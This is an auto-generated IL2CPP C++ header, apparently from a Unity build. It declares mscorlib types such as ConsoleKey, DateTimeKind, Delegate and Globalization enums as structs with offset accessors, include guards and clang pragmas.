#pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ArithmeticException struct ArithmeticException_tF9EF5FE94597830EF315C5934258F994B8648269 : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ARITHMETICEXCEPTION_TF9EF5FE94597830EF315C5934258F994B8648269_H #ifndef BASE64FORMATTINGOPTIONS_T3D2B3AE9295A0F8B2C84D603C3178659D1C11ADE_H #define BASE64FORMATTINGOPTIONS_T3D2B3AE9295A0F8B2C84D603C3178659D1C11ADE_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Base64FormattingOptions struct Base64FormattingOptions_t3D2B3AE9295A0F8B2C84D603C3178659D1C11ADE { public: // System.Int32 System.Base64FormattingOptions::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(Base64FormattingOptions_t3D2B3AE9295A0F8B2C84D603C3178659D1C11ADE, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // BASE64FORMATTINGOPTIONS_T3D2B3AE9295A0F8B2C84D603C3178659D1C11ADE_H #ifndef ASSEMBLYHASHALGORITHM_T31E4F1BC642CF668706C9D0FBD9DFDF5EE01CEB9_H #define ASSEMBLYHASHALGORITHM_T31E4F1BC642CF668706C9D0FBD9DFDF5EE01CEB9_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Configuration.Assemblies.AssemblyHashAlgorithm struct AssemblyHashAlgorithm_t31E4F1BC642CF668706C9D0FBD9DFDF5EE01CEB9 { public: // System.Int32 System.Configuration.Assemblies.AssemblyHashAlgorithm::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(AssemblyHashAlgorithm_t31E4F1BC642CF668706C9D0FBD9DFDF5EE01CEB9, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ASSEMBLYHASHALGORITHM_T31E4F1BC642CF668706C9D0FBD9DFDF5EE01CEB9_H #ifndef ASSEMBLYVERSIONCOMPATIBILITY_TEA062AB37A9A750B33F6CA2898EEF03A4EEA496C_H #define ASSEMBLYVERSIONCOMPATIBILITY_TEA062AB37A9A750B33F6CA2898EEF03A4EEA496C_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Configuration.Assemblies.AssemblyVersionCompatibility struct AssemblyVersionCompatibility_tEA062AB37A9A750B33F6CA2898EEF03A4EEA496C { public: // System.Int32 System.Configuration.Assemblies.AssemblyVersionCompatibility::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(AssemblyVersionCompatibility_tEA062AB37A9A750B33F6CA2898EEF03A4EEA496C, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ASSEMBLYVERSIONCOMPATIBILITY_TEA062AB37A9A750B33F6CA2898EEF03A4EEA496C_H #ifndef CONSOLECOLOR_T2E01225594844040BE12231E6A14F85FCB78C597_H #define CONSOLECOLOR_T2E01225594844040BE12231E6A14F85FCB78C597_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleColor struct ConsoleColor_t2E01225594844040BE12231E6A14F85FCB78C597 { public: // System.Int32 System.ConsoleColor::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(ConsoleColor_t2E01225594844040BE12231E6A14F85FCB78C597, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLECOLOR_T2E01225594844040BE12231E6A14F85FCB78C597_H #ifndef CONSOLEKEY_T0196714F06D59B40580F7B85EA2663D81394682C_H #define CONSOLEKEY_T0196714F06D59B40580F7B85EA2663D81394682C_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleKey struct ConsoleKey_t0196714F06D59B40580F7B85EA2663D81394682C { public: // System.Int32 System.ConsoleKey::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(ConsoleKey_t0196714F06D59B40580F7B85EA2663D81394682C, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLEKEY_T0196714F06D59B40580F7B85EA2663D81394682C_H #ifndef CONSOLEMODIFIERS_TCB55098B71E4DCCEE972B1056E64D1B8AB9EAB34_H #define CONSOLEMODIFIERS_TCB55098B71E4DCCEE972B1056E64D1B8AB9EAB34_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleModifiers struct ConsoleModifiers_tCB55098B71E4DCCEE972B1056E64D1B8AB9EAB34 { public: // System.Int32 System.ConsoleModifiers::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(ConsoleModifiers_tCB55098B71E4DCCEE972B1056E64D1B8AB9EAB34, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLEMODIFIERS_TCB55098B71E4DCCEE972B1056E64D1B8AB9EAB34_H #ifndef CONSOLESCREENBUFFERINFO_TA8045B7C44EF25956D3B0847F24465E9CF18954F_H #define CONSOLESCREENBUFFERINFO_TA8045B7C44EF25956D3B0847F24465E9CF18954F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleScreenBufferInfo struct ConsoleScreenBufferInfo_tA8045B7C44EF25956D3B0847F24465E9CF18954F { public: // System.Coord System.ConsoleScreenBufferInfo::Size Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A ___Size_0; // System.Coord System.ConsoleScreenBufferInfo::CursorPosition Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A ___CursorPosition_1; // System.Int16 System.ConsoleScreenBufferInfo::Attribute int16_t ___Attribute_2; // System.SmallRect System.ConsoleScreenBufferInfo::Window SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532 ___Window_3; // System.Coord System.ConsoleScreenBufferInfo::MaxWindowSize Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A ___MaxWindowSize_4; public: inline static int32_t get_offset_of_Size_0() { return static_cast<int32_t>(offsetof(ConsoleScreenBufferInfo_tA8045B7C44EF25956D3B0847F24465E9CF18954F, ___Size_0)); } inline Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A get_Size_0() const { return ___Size_0; } inline Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A * get_address_of_Size_0() { return &___Size_0; } inline void set_Size_0(Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A value) { ___Size_0 = value; } inline static int32_t get_offset_of_CursorPosition_1() { return static_cast<int32_t>(offsetof(ConsoleScreenBufferInfo_tA8045B7C44EF25956D3B0847F24465E9CF18954F, ___CursorPosition_1)); } inline Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A get_CursorPosition_1() const { return ___CursorPosition_1; } inline Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A * get_address_of_CursorPosition_1() { return &___CursorPosition_1; } inline void set_CursorPosition_1(Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A value) { ___CursorPosition_1 = value; } inline static int32_t get_offset_of_Attribute_2() { return static_cast<int32_t>(offsetof(ConsoleScreenBufferInfo_tA8045B7C44EF25956D3B0847F24465E9CF18954F, ___Attribute_2)); } inline int16_t get_Attribute_2() const { return ___Attribute_2; } inline int16_t* get_address_of_Attribute_2() { return &___Attribute_2; } inline void set_Attribute_2(int16_t value) { ___Attribute_2 = value; } inline static int32_t get_offset_of_Window_3() { return static_cast<int32_t>(offsetof(ConsoleScreenBufferInfo_tA8045B7C44EF25956D3B0847F24465E9CF18954F, ___Window_3)); } inline SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532 get_Window_3() const { return ___Window_3; } inline SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532 * get_address_of_Window_3() { return &___Window_3; } inline void set_Window_3(SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532 value) { ___Window_3 = value; } inline static int32_t get_offset_of_MaxWindowSize_4() { return static_cast<int32_t>(offsetof(ConsoleScreenBufferInfo_tA8045B7C44EF25956D3B0847F24465E9CF18954F, ___MaxWindowSize_4)); } inline Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A get_MaxWindowSize_4() const { return ___MaxWindowSize_4; } inline Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A * get_address_of_MaxWindowSize_4() { return &___MaxWindowSize_4; } inline void set_MaxWindowSize_4(Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A value) { ___MaxWindowSize_4 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLESCREENBUFFERINFO_TA8045B7C44EF25956D3B0847F24465E9CF18954F_H #ifndef CONSOLESPECIALKEY_T367BA17429AFB5DE682EB33A1AD6085EDFD65B6F_H #define CONSOLESPECIALKEY_T367BA17429AFB5DE682EB33A1AD6085EDFD65B6F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleSpecialKey struct ConsoleSpecialKey_t367BA17429AFB5DE682EB33A1AD6085EDFD65B6F { public: // System.Int32 System.ConsoleSpecialKey::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(ConsoleSpecialKey_t367BA17429AFB5DE682EB33A1AD6085EDFD65B6F, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLESPECIALKEY_T367BA17429AFB5DE682EB33A1AD6085EDFD65B6F_H #ifndef DTSUBSTRINGTYPE_TA15E6919CA4FEC2739587ADF93B5F8D550A9BC4E_H #define DTSUBSTRINGTYPE_TA15E6919CA4FEC2739587ADF93B5F8D550A9BC4E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DTSubStringType struct DTSubStringType_tA15E6919CA4FEC2739587ADF93B5F8D550A9BC4E { public: // System.Int32 System.DTSubStringType::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(DTSubStringType_tA15E6919CA4FEC2739587ADF93B5F8D550A9BC4E, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DTSUBSTRINGTYPE_TA15E6919CA4FEC2739587ADF93B5F8D550A9BC4E_H #ifndef DATETIMEKIND_T6BC23532930B812ABFCCEB2B61BC233712B180EE_H #define DATETIMEKIND_T6BC23532930B812ABFCCEB2B61BC233712B180EE_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeKind struct DateTimeKind_t6BC23532930B812ABFCCEB2B61BC233712B180EE { public: // System.Int32 System.DateTimeKind::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(DateTimeKind_t6BC23532930B812ABFCCEB2B61BC233712B180EE, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIMEKIND_T6BC23532930B812ABFCCEB2B61BC233712B180EE_H #ifndef DS_T79917654E7C7DD9C4B85FC70179677948A467675_H #define DS_T79917654E7C7DD9C4B85FC70179677948A467675_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeParse/DS struct DS_t79917654E7C7DD9C4B85FC70179677948A467675 { public: // System.Int32 System.DateTimeParse/DS::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(DS_t79917654E7C7DD9C4B85FC70179677948A467675, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DS_T79917654E7C7DD9C4B85FC70179677948A467675_H #ifndef DTT_T64CF841467D9194B8D66F5FAAC5484C4F4BE09F0_H #define DTT_T64CF841467D9194B8D66F5FAAC5484C4F4BE09F0_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeParse/DTT struct DTT_t64CF841467D9194B8D66F5FAAC5484C4F4BE09F0 { public: // System.Int32 System.DateTimeParse/DTT::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(DTT_t64CF841467D9194B8D66F5FAAC5484C4F4BE09F0, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DTT_T64CF841467D9194B8D66F5FAAC5484C4F4BE09F0_H #ifndef TM_T88131D3D9CB467F2A2E92B7ED840638B1DDA1DA7_H #define TM_T88131D3D9CB467F2A2E92B7ED840638B1DDA1DA7_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeParse/TM struct TM_t88131D3D9CB467F2A2E92B7ED840638B1DDA1DA7 { public: // System.Int32 System.DateTimeParse/TM::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(TM_t88131D3D9CB467F2A2E92B7ED840638B1DDA1DA7, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TM_T88131D3D9CB467F2A2E92B7ED840638B1DDA1DA7_H #ifndef DAYOFWEEK_TE7CD4C3124650FF8B2AD3E9DBD34B9896927DFF8_H #define DAYOFWEEK_TE7CD4C3124650FF8B2AD3E9DBD34B9896927DFF8_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DayOfWeek struct DayOfWeek_tE7CD4C3124650FF8B2AD3E9DBD34B9896927DFF8 { public: // System.Int32 System.DayOfWeek::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(DayOfWeek_tE7CD4C3124650FF8B2AD3E9DBD34B9896927DFF8, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DAYOFWEEK_TE7CD4C3124650FF8B2AD3E9DBD34B9896927DFF8_H #ifndef DELEGATE_T_H #define DELEGATE_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Delegate struct Delegate_t : public RuntimeObject { public: // System.IntPtr System.Delegate::method_ptr Il2CppMethodPointer ___method_ptr_0; // System.IntPtr System.Delegate::invoke_impl intptr_t ___invoke_impl_1; // System.Object System.Delegate::m_target RuntimeObject * ___m_target_2; // System.IntPtr System.Delegate::method intptr_t ___method_3; // System.IntPtr System.Delegate::delegate_trampoline intptr_t ___delegate_trampoline_4; // System.IntPtr System.Delegate::extra_arg intptr_t ___extra_arg_5; // System.IntPtr System.Delegate::method_code intptr_t ___method_code_6; // System.Reflection.MethodInfo System.Delegate::method_info MethodInfo_t * ___method_info_7; // System.Reflection.MethodInfo System.Delegate::original_method_info MethodInfo_t * ___original_method_info_8; // System.DelegateData System.Delegate::data DelegateData_t1BF9F691B56DAE5F8C28C5E084FDE94F15F27BBE * ___data_9; // System.Boolean System.Delegate::method_is_virtual bool ___method_is_virtual_10; public: inline static int32_t get_offset_of_method_ptr_0() { return static_cast<int32_t>(offsetof(Delegate_t, ___method_ptr_0)); } inline Il2CppMethodPointer get_method_ptr_0() const { return ___method_ptr_0; } inline Il2CppMethodPointer* get_address_of_method_ptr_0() { return &___method_ptr_0; } inline void set_method_ptr_0(Il2CppMethodPointer value) { ___method_ptr_0 = value; } inline static int32_t get_offset_of_invoke_impl_1() { return static_cast<int32_t>(offsetof(Delegate_t, ___invoke_impl_1)); } inline intptr_t get_invoke_impl_1() const { return ___invoke_impl_1; } inline intptr_t* get_address_of_invoke_impl_1() { return &___invoke_impl_1; } inline void set_invoke_impl_1(intptr_t value) { ___invoke_impl_1 = value; } inline static int32_t get_offset_of_m_target_2() { return static_cast<int32_t>(offsetof(Delegate_t, ___m_target_2)); } inline RuntimeObject * get_m_target_2() const { return ___m_target_2; } inline RuntimeObject ** get_address_of_m_target_2() { return &___m_target_2; } inline void set_m_target_2(RuntimeObject * value) { ___m_target_2 = value; Il2CppCodeGenWriteBarrier((&___m_target_2), value); } inline static int32_t get_offset_of_method_3() { return static_cast<int32_t>(offsetof(Delegate_t, ___method_3)); } inline intptr_t get_method_3() const { return ___method_3; } inline intptr_t* get_address_of_method_3() { return &___method_3; } inline void set_method_3(intptr_t value) { ___method_3 = value; } inline static int32_t get_offset_of_delegate_trampoline_4() { return static_cast<int32_t>(offsetof(Delegate_t, ___delegate_trampoline_4)); } inline intptr_t get_delegate_trampoline_4() const { return ___delegate_trampoline_4; } inline intptr_t* get_address_of_delegate_trampoline_4() { return &___delegate_trampoline_4; } inline void set_delegate_trampoline_4(intptr_t value) { ___delegate_trampoline_4 = value; } inline static int32_t get_offset_of_extra_arg_5() { return static_cast<int32_t>(offsetof(Delegate_t, ___extra_arg_5)); } inline intptr_t get_extra_arg_5() const { return ___extra_arg_5; } inline intptr_t* get_address_of_extra_arg_5() { return &___extra_arg_5; } inline void set_extra_arg_5(intptr_t value) { ___extra_arg_5 = value; } inline static int32_t get_offset_of_method_code_6() { return static_cast<int32_t>(offsetof(Delegate_t, ___method_code_6)); } inline intptr_t get_method_code_6() const { return ___method_code_6; } inline intptr_t* get_address_of_method_code_6() { return &___method_code_6; } inline void set_method_code_6(intptr_t value) { ___method_code_6 = value; } inline static int32_t get_offset_of_method_info_7() { return static_cast<int32_t>(offsetof(Delegate_t, ___method_info_7)); } inline MethodInfo_t * get_method_info_7() const { return ___method_info_7; } inline MethodInfo_t ** get_address_of_method_info_7() { return &___method_info_7; } inline void set_method_info_7(MethodInfo_t * value) { ___method_info_7 = value; Il2CppCodeGenWriteBarrier((&___method_info_7), value); } inline static int32_t get_offset_of_original_method_info_8() { return static_cast<int32_t>(offsetof(Delegate_t, ___original_method_info_8)); } inline MethodInfo_t * get_original_method_info_8() const { return ___original_method_info_8; } inline MethodInfo_t ** get_address_of_original_method_info_8() { return &___original_method_info_8; } inline void set_original_method_info_8(MethodInfo_t * value) { ___original_method_info_8 = value; Il2CppCodeGenWriteBarrier((&___original_method_info_8), value); } inline static int32_t get_offset_of_data_9() { return static_cast<int32_t>(offsetof(Delegate_t, ___data_9)); } inline DelegateData_t1BF9F691B56DAE5F8C28C5E084FDE94F15F27BBE * get_data_9() const { return ___data_9; } inline DelegateData_t1BF9F691B56DAE5F8C28C5E084FDE94F15F27BBE ** get_address_of_data_9() { return &___data_9; } inline void set_data_9(DelegateData_t1BF9F691B56DAE5F8C28C5E084FDE94F15F27BBE * value) { ___data_9 = value; Il2CppCodeGenWriteBarrier((&___data_9), value); } inline static int32_t get_offset_of_method_is_virtual_10() { return static_cast<int32_t>(offsetof(Delegate_t, ___method_is_virtual_10)); } inline bool get_method_is_virtual_10() const { return ___method_is_virtual_10; } inline bool* get_address_of_method_is_virtual_10() { return &___method_is_virtual_10; } inline void set_method_is_virtual_10(bool value) { ___method_is_virtual_10 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.Delegate struct Delegate_t_marshaled_pinvoke { intptr_t ___method_ptr_0; intptr_t ___invoke_impl_1; Il2CppIUnknown* ___m_target_2; intptr_t ___method_3; intptr_t ___delegate_trampoline_4; intptr_t ___extra_arg_5; intptr_t ___method_code_6; MethodInfo_t * ___method_info_7; MethodInfo_t * ___original_method_info_8; DelegateData_t1BF9F691B56DAE5F8C28C5E084FDE94F15F27BBE * ___data_9; int32_t ___method_is_virtual_10; }; // Native definition for COM marshalling of System.Delegate struct Delegate_t_marshaled_com { intptr_t ___method_ptr_0; intptr_t ___invoke_impl_1; Il2CppIUnknown* ___m_target_2; intptr_t ___method_3; intptr_t ___delegate_trampoline_4; intptr_t ___extra_arg_5; intptr_t ___method_code_6; MethodInfo_t * ___method_info_7; MethodInfo_t * ___original_method_info_8; DelegateData_t1BF9F691B56DAE5F8C28C5E084FDE94F15F27BBE * ___data_9; int32_t ___method_is_virtual_10; }; #endif // DELEGATE_T_H #ifndef FORMATEXCEPTION_T2808E076CDE4650AF89F55FD78F49290D0EC5BDC_H #define FORMATEXCEPTION_T2808E076CDE4650AF89F55FD78F49290D0EC5BDC_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.FormatException struct FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // FORMATEXCEPTION_T2808E076CDE4650AF89F55FD78F49290D0EC5BDC_H #ifndef COMPAREOPTIONS_T163DCEA9A0972750294CC1A8348E5CA69E943939_H #define COMPAREOPTIONS_T163DCEA9A0972750294CC1A8348E5CA69E943939_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.CompareOptions struct CompareOptions_t163DCEA9A0972750294CC1A8348E5CA69E943939 { public: // System.Int32 System.Globalization.CompareOptions::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(CompareOptions_t163DCEA9A0972750294CC1A8348E5CA69E943939, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // COMPAREOPTIONS_T163DCEA9A0972750294CC1A8348E5CA69E943939_H #ifndef DATETIMEFORMATFLAGS_TA363B5524F41DE008B4AB8304F1E995E2C8CF675_H #define DATETIMEFORMATFLAGS_TA363B5524F41DE008B4AB8304F1E995E2C8CF675_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.DateTimeFormatFlags struct DateTimeFormatFlags_tA363B5524F41DE008B4AB8304F1E995E2C8CF675 { public: // System.Int32 System.Globalization.DateTimeFormatFlags::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(DateTimeFormatFlags_tA363B5524F41DE008B4AB8304F1E995E2C8CF675, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIMEFORMATFLAGS_TA363B5524F41DE008B4AB8304F1E995E2C8CF675_H #ifndef DATETIMESTYLES_TD09B34DB3747CD91D8AAA1238C7595845715301E_H #define DATETIMESTYLES_TD09B34DB3747CD91D8AAA1238C7595845715301E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.DateTimeStyles struct DateTimeStyles_tD09B34DB3747CD91D8AAA1238C7595845715301E { public: // System.Int32 System.Globalization.DateTimeStyles::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(DateTimeStyles_tD09B34DB3747CD91D8AAA1238C7595845715301E, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIMESTYLES_TD09B34DB3747CD91D8AAA1238C7595845715301E_H #ifndef HS_TED481C3F588CA837D1B9C458FB9807A33E5281BF_H #define HS_TED481C3F588CA837D1B9C458FB9807A33E5281BF_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.HebrewNumber/HS struct HS_tED481C3F588CA837D1B9C458FB9807A33E5281BF { public: // System.Int32 System.Globalization.HebrewNumber/HS::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(HS_tED481C3F588CA837D1B9C458FB9807A33E5281BF, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // HS_TED481C3F588CA837D1B9C458FB9807A33E5281BF_H #ifndef HEBREWNUMBERPARSINGSTATE_TF84EE7228A79EDFEC1CD8CB95E570F18108B02EE_H #define HEBREWNUMBERPARSINGSTATE_TF84EE7228A79EDFEC1CD8CB95E570F18108B02EE_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.HebrewNumberParsingState struct HebrewNumberParsingState_tF84EE7228A79EDFEC1CD8CB95E570F18108B02EE { public: // System.Int32 System.Globalization.HebrewNumberParsingState::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(HebrewNumberParsingState_tF84EE7228A79EDFEC1CD8CB95E570F18108B02EE, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // HEBREWNUMBERPARSINGSTATE_TF84EE7228A79EDFEC1CD8CB95E570F18108B02EE_H #ifndef MONTHNAMESTYLES_T7B32268D94A74B51193D30F7A06688B4029C060D_H #define MONTHNAMESTYLES_T7B32268D94A74B51193D30F7A06688B4029C060D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.MonthNameStyles struct MonthNameStyles_t7B32268D94A74B51193D30F7A06688B4029C060D { public: // System.Int32 System.Globalization.MonthNameStyles::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(MonthNameStyles_t7B32268D94A74B51193D30F7A06688B4029C060D, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // MONTHNAMESTYLES_T7B32268D94A74B51193D30F7A06688B4029C060D_H #ifndef NUMBERSTYLES_TB0ADA2D9CCAA236331AED14C42BE5832B2351592_H #define NUMBERSTYLES_TB0ADA2D9CCAA236331AED14C42BE5832B2351592_H #ifdef 